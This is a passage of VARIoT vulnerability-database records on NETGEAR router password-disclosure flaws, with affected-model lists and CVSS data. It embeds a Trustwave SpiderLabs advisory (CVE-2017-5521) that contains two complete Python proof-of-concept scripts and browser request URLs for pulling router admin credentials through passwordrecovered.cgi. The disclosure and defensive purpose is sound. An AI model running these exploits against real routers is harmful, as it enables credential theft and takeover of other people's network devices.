"NVD", "id": "CVE-2016-11059" }, { "date": "2020-05-15T00:00:00", "db": "CNNVD", "id": "CNNVD-202004-2304" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202004-2304" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural NETGEAR Information leakage vulnerabilities in devices", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-014989" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-202004-2304" } ], "trust": 0.6 } }
var-201606-0554
Vulnerability from variot
Netgear is the world's leading enterprise network solution and advocate for digital home networking applications. There are web interface login password leaks in Netgear's various devices. When password recovery is disabled, an attacker who can access the internal network or remotely manage the router interface can exploit the vulnerability to obtain the management interface login password.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201606-0554", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "r8500 v1.0.2.58 1.0.58", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r8000 v1.0.3.4 1.1.2", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r7900 v1.0.1.4 10.0.12", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r7300 v1.0.0.36 1.0.8", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r7000 v1.0.5.62 1.1.87", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r6900 v1.0.0.4 1.0.10", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r6700 v1.0.0.26 10.0.26", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r6400 v1.0.1.6 1.0.4", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r6300v2 v1.0.4.2 10.0.74", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "ac1450 v1.0.0.34 10.0.16", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r6300 v1.0.2.78 1.0.58", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r6250 v1.0.4.2 10.1.10", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r6200v2 v1.0.3.8 10.1.6", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "r6200 v1.0.1.56 1.0.43", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "wndr4500v2 v1.0.0.60 1.0.38", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "wndr4500 v1.0.1.44 1.0.73", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "wndr4000 v1.0.2.4 9.1.86", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "wndr3700v3 v1.0.0.40 1.0.32", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "wndr3400v3 v1.0.1.4 1.0.52", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "wndr3400v2 v1.0.0.48 1.0.75", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "wnr3500lv2 v1.2.0.34 40.0.75", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "wnr1000v3 v1.0.2.68 60.0.93", "scope": null, "trust": 0.6, "vendor": "netgear", "version": null }, { "model": "c6300", "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v2.01.14" }, { "model": "d6300", "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v1.0.0.96" }, { "model": "d6300b", "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v1.0.0.40" }, { "model": "d6400", "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v1.0.0.44" }, { "model": "d6220", "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v1.0.0.12" }, { "model": "dgn2200v4", "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v1.0.0.66" }, { "model": "dgn2200bv4", "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v1.0.0.68" }, { "model": "vegn2610", "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v1.0.0.36" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "netgear", "version": "v6510v1.0.0.20" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ] }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2016-04399", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "CNVD", "id": "CNVD-2016-04399", "trust": 0.6, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Netgear is the world\u0027s leading enterprise network solution and advocate for digital home networking applications. There are web interface login password leaks in Netgear\u0027s various devices. When password recovery is disabled, an attacker who can access the internal network or remotely manage the router interface can exploit the vulnerability to obtain the management interface login password.", "sources": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ], "trust": 0.6 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CNVD", "id": "CNVD-2016-04399", "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ] }, "id": "VAR-201606-0554", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ], "trust": 1.2337010255555554 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ] }, "last_update_date": "2022-05-04T09:39:47.379000Z", "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.6, "url": "http://kb.netgear.com/app/answers/detail/a_id/30632/~/web-gui-password-recovery-and-exposure-security-vulnerability" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-06-30T00:00:00", "db": "CNVD", "id": "CNVD-2016-04399" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-07-01T00:00:00", "db": "CNVD", "id": "CNVD-2016-04399" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Netgear Device Web Interface Login Password Disclosure Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2016-04399" } ], "trust": 0.6 } }
var-201701-0766
Vulnerability from variot
An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions. NETGEARR8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 and R8000 are Netgear's wireless router products. There are information disclosure vulnerabilities in several NETGEAR products. Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers
Published: 01/30/2017 Version: 1.0
Vendor: NETGEAR (http://www.netgear.com/) Product: Multiple products
Finding 1: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521
Version affected:
AC1450 V1.0.0.34_10.0.16 (Latest)
AC1450 V1.0.0.22_1.0.10
AC1450 V1.0.0.14_1.0.6
D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
D6400 V1.0.0.34_1.3.34
D6400 V1.0.0.38_1.1.38
D6400 V1.0.0.22_1.0.22
DC112A V1.0.0.30_1.0.60 (Latest)
DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
JNDR3000 V1.0.0.18_1.0.16 (Latest)
R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
R6300 V1.0.2.78_1.0.58 (Latest)
R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
R6300v2 V1.0.3.30_10.0.73
R6700 V1.0.1.14_10.0.29 (Latest beta)
R6700 V1.0.0.26_10.0.26 (Latest stable)
R6700 V1.0.0.24_10.0.18
R6900 V1.0.0.4_1.0.10 (Latest)
R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
R8300 V1.0.2.48_1.0.52
R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
R8500 V1.0.2.26_1.0.41
R8500 V1.0.0.56_1.0.28
R8500 V1.0.0.20_1.0.11
VEGN2610 V1.0.0.35_1.0.35 (Latest)
VEGN2610 V1.0.0.29_1.0.29
VEGN2610 V1.0.0.27_1.0.27
WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
WNDR4000 V1.0.2.4_9.1.86 (Latest)
WNDR4500 V1.0.1.40_1.0.68 (Latest)
WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
WNDR4500v2 V1.0.0.42_1.0.25
WGR614v10 V1.0.2.60_60.0.85NA (Latest)
WGR614v10 V1.0.2.58_60.0.84NA
WGR614v10 V1.0.2.54_60.0.82NA
WN3100RP V1.0.0.14_1.0.19 (Latest)
WN3100RP V1.0.0.6_1.0.12
Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
Lenovo R3220 V1.0.0.13_1.0.13
Product description: Multiple Netgear Routers
Many Netgear routers are prone to password disclosure via simple crafted requests to the web management server. This can easily be reproduced using the attached poc, or by sending these two simple requests via the browser: 1. http://router/.../ will redirect you to http://router/..../unauth.cgi?id=TOKEN to acquire the token 2. http://router/passwordrecovered.cgi?id=TOKEN will give you credentials (some models require you to send a post request instead of get)
netgore.py
import sys import requests
def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english"
disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
1st stage - get token
ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0) token = scrape(r.text, 'unauth.cgi?id=', '\"') if token == 'i_dont_speak_english': print "not vulnerable" sys.exit(0) print "token found: " + token
2nd stage - pass the token - get the password
url = url + 'passwordrecovered.cgi?id=' + token r = requests.post(url, verify=False)
profit
if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username', ''))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password', ''))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) else: print "not vulnerable becuse password recovery IS set" sys.exit(0)
html encoding pops out of nowhere, lets replace that
password = password.replace("#","#") password = password.replace("&","&") print "user: " + username print "pass: " + password
================================ Just run the PoC against a router to get the credentials if it is vulnerable.
Finding 2: Remote and Local Password Disclosure Credit: Simon Kenin of Trustwave SpiderLabs CVE: CVE-2017-5521
Version affected:
AC1450 V1.0.0.34_10.0.16 (Latest)
AC1450 V1.0.0.22_1.0.10
AC1450 V1.0.0.14_1.0.6
D6300 V1.0.0.96_1.1.96 (Latest)
D6300B V1.0.0.36_1.0.36
D6300B V1.0.0.32_1.0.32
D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
D6400 V1.0.0.22_1.0.22
DC112A V1.0.0.30_1.0.60 (Latest)
DGN2200v4 V1.0.0.76_1.0.76 (Latest)
DGN2200v4 V1.0.0.66_1.0.66
DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
JNDR3000 V1.0.0.18_1.0.16 (Latest)
R6200 V1.0.1.56_1.0.43 (Latest)
R6200 V1.0.1.52_1.0.41
R6200 V1.0.1.48_1.0.37
R6200v2 V1.0.3.10_10.1.10 (Latest)
R6200v2 V1.0.1.20_1.0.18
R6250 V1.0.4.6_10.1.12 (Latest beta)
R6250 V1.0.4.2_10.1.10 (Latest stable)
R6250 V1.0.1.84_1.0.78
R6300 V1.0.2.78_1.0.58 (Latest)
R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
R6700 V1.0.0.26_10.0.26 (Latest)
R6700 V1.0.0.24_10.0.18
R6900 V1.0.0.4_1.0.10 (Latest)
R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
R7000 V1.0.4.30_1.1.67
R7900 V1.0.1.8_10.0.14 (Latest beta)
R7900 V1.0.1.4_10.0.12 (Latest stable)
R7900 V1.0.0.10_10.0.7
R7900 V1.0.0.8_10.0.5
R7900 V1.0.0.6_10.0.4
R8000 V1.0.3.26_1.1.18 (Latest beta)
R8000 V1.0.3.4_1.1.2 (Latest stable)
R8300 V1.0.2.48_1.0.52
R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
R8500 V1.0.2.30_1.0.43
VEGN2610 V1.0.0.35_1.0.35 (Latest)
VEGN2610 V1.0.0.27_1.0.27
VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
VEVG2660 V1.0.0.23_1.0.23
WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
WNDR3400v3 V1.0.1.2_1.0.51
WNDR3400v3 V1.0.0.22_1.0.29
WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
WNDR4000 V1.0.2.4_9.1.86 (Latest)
WNDR4500 V1.0.1.40_1.0.68 (Latest)
WNDR4500 V1.0.1.6_1.0.24
WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
WNDR4500v2 V1.0.0.50_1.0.30
WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
WNR1000v3 V1.0.2.62_60.0.87 (Latest)
WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
WNR3500Lv2 V1.2.0.32_40.0.74
WGR614v10 V1.0.2.60_60.0.85NA (Latest)
WGR614v10 V1.0.2.58_60.0.84NA
WGR614v10 V1.0.2.54_60.0.82NA
Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
Lenovo R3220 V1.0.0.13_1.0.13
Many Netgear routers are prone to password disclosure via simple crafted request to the web management server.
This mechanism does not work correctly on the very first request to "passwordrecovered.cgi" and the token is not properly checked, this means that any TOKEN value will result in disclosure of the password. The issue occurs after every reboot of the router.
This can easily be reproduced using the attached poc, or by sending a simple request via the browser: 1. http://router/passwordrecovered.cgi?id=Trustwave_SpiderLabs will give you credentials (some models require you to send a post request instead of get)
netgore2.py
import sys import requests
def scrape(text, start_trig, end_trig): if text.find(start_trig) != -1: return text.split(start_trig, 1)[-1].split(end_trig, 1)[0] else: return "i_dont_speak_english"
disable nasty insecure ssl warning
requests.packages.urllib3.disable_warnings()
1st stage
ip = sys.argv[1] port = sys.argv[2] url = 'http://' + ip + ':' + port + '/' try: r = requests.get(url) except: url = 'https://' + ip + ':' + port + '/' r = requests.get(url, verify=False) model = r.headers.get('WWW-Authenticate') if model is not None: print "Attcking: " + model[13:-1] else: print "not a netgear router" sys.exit(0)
2nd stage
url = url + 'passwordrecovered.cgi?id=get_rekt' try: r = requests.post(url, verify=False) except: print "not vulnerable router" sys.exit(0)
profit
if r.text.find('left\">') != -1: username = (repr(scrape(r.text, 'Router Admin Username', ''))) username = scrape(username, '>', '\'') password = (repr(scrape(r.text, 'Router Admin Password', ''))) password = scrape(password, '>', '\'') if username == "i_dont_speak_english": username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '')) password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '')) else: print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again" sys.exit(0)
html encoding pops out of nowhere, lets replace that
password = password.replace("#","#") password = password.replace("&","&") print "user: " + username print "pass: " + password
================================ Just run the PoC against a router to get the credentials if it is vulnerable.
Remediation Steps: Please see NETGEAR's KBA for list of firmware patches for various models.
Revision History: 04/06/2016 - Vulnerability disclosed to vendor 04/19/2016 - Request for update and received confirmation of receipt of the advisories 05/18/2016 - Request for update; no response 07/14/2016 - Request for update 07/15/2016 - Notice of patch for some models and workaround KBA received along with commitment towards 100% coverage 10/17/2016 - Request for update 12/15/2016 - Notice of intent to publish advisories 01/04/2017 - Vendor responds with patch timeline and announcement of participation in Bugcrowd 01/30/2017 - Advisory published
References 1. http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html 2. https://www.exploit-db.com/exploits/32883/ 3. http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs
Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0766", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "wndr4500", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.1.44_1.0.73" }, { "model": "d6400", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.0.44" }, { "model": "d6300b", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.0.40" }, { "model": "wnr1000v3", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.2.68_60.0.93" }, { "model": "ac1450", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.0.34_10.0.16" }, { "model": "wndr3700v3", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.0.40_1.0.32" }, { "model": "d6220", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.0.12" }, { "model": "dgn2200bv4", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.0.68" }, { "model": "d6300", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.0.96" }, { "model": "wndr4000", "scope": "eq", "trust": 1.6, "vendor": "netgear", "version": "1.0.2.4_9.1.86" }, { "model": "r6200", "scope": "eq", "trust": 1.0, "vendor": "netgear", "version": "1.0.1.56_1.0.43" }, { "model": "vegn2610", "scope": "eq", "trust": 1.0, "vendor": "netgear", "version": "1.0.0.36" }, { "model": "r6300", "scope": "eq", "trust": 1.0, "vendor": "netgear", "version": "1.0.2.78_1.0.58" }, { "model": "r8500", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r7000", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r8300", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r6400", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r7300", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r7100lg", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r6300v2", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "wndr3400v3", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "wnr3500lv2", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r6250", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r6700", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r8000", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "r6900", "scope": "eq", "trust": 0.9, "vendor": "netgear", "version": "0" }, { "model": "ac1450", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "ac1450", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.0.34_10.0.16" }, { "model": "d6220", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "d6220", "scope": "lt", "trust": 0.8, "vendor": "net gear", "version": "1.0.0.22" }, { "model": "d6300", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "d6300", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.0.96" }, { "model": "d6300b", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "d6300b", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.0.40" }, { "model": "d6400", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "d6400", "scope": "lt", "trust": 0.8, "vendor": "net gear", "version": "1.0.0.56" }, { "model": "dgn2200bv4", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "dgn2200bv4", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.0.68" }, { "model": "r6200", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "r6200", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.1.56_1.0.43" }, { "model": "r6300", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "r6300", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.2.78_1.0.58" }, { "model": "vegn2610", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "vegn2610", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.0.14_1.0.12" }, { "model": "wndr3700v3", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "wndr3700v3", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.0.38_1.0.31" }, { "model": "wndr4000", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "wndr4000", "scope": "eq", "trust": 0.8, "vendor": "net gear", "version": "1.0.2.4_9.1.86" }, { "model": "wndr4500", "scope": null, "trust": 0.8, "vendor": "net gear", "version": null }, { "model": "wndr4500", "scope": "eq", "trust": 0.8, 